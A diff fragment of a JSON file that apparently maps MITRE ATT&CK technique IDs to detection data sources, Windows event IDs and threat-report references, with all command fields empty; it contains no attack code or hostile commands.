"target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + null + ] + }, + { + "technique_id": "T1032", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Malware reverse engineering" + ], + [ + "SSL/TLS inspection" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Malware reverse engineering" + ], + [ + "SSL/TLS inspection" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ] + ], + "external_reference": [ + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.group-ib.com/blog/cobalt", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + ] + }, + { + "technique_id": "T1065", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Netflow/Enclave netflow" + ] + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://citizenlab.org/2016/08/group5-syria/", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + { + "technique_id": "T1174", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Sysmon", + "DLL monitoring" + ], + [ + "Autoruns" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "LOG-MD", + "Autoruns" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1111", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "MFA" + ], + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1116", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "B9", + "Binary file metadata" + ], + [ + "LMD - File Hash" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ], + [ + "LOG-MD", + " - File Hash" + ] + ], + "external_reference": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf", + "http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", + "https://securelist.com/winnti-more-than-just-a-game/37029/", + "https://securelist.com/operation-daybreak/75100/", + "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ] + }, + { + "technique_id": "T1186", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1045", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "LOG-MD - B9", + "Binary file metadata" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ] + ], + "external_reference": [ + "https://securelist.com/the-dropping-elephant-actor/75328/", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://content.fireeye.com/apt/rpt-apt38", + "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://citizenlab.org/2016/08/group5-syria/", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + ] + }, + { + "technique_id": "T1109", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File Monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File Monitoring" + ] + ], + "external_reference": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf" + ] + }, + { + "technique_id": "T1198", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Windows event logs" + ], + [ + "Loaded DLLs" + ], + [ + "DLL monitoring" + ], + [ + "API monitoring" + ], + [ + "Application Logs" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Windows event logs" + ], + [ + "Sysmon - ID 7", + "Loaded DLLs" + ], + [ + "Sysmon - ID 7", + "DLL monitoring" + ], + [ + "API monitoring" + ], + [ + "Application Logs" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1173", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Windows event logs" + ], + [ + "DLL monitoring" + ], + [ + "API monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "Windows Registry" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "Windows event logs" + ], + [ + "API monitoring" + ] + ], + "external_reference": [ + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://www.cyberscoop.com/fin7-dde-morphisec-fileless-malware/", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://securelist.com/operation-daybreak/75100/", + "https://securelist.com/muddywater/88059/" + ] + }, + { + "technique_id": "T1061", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "B9", + "Binary file metadata" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [ + 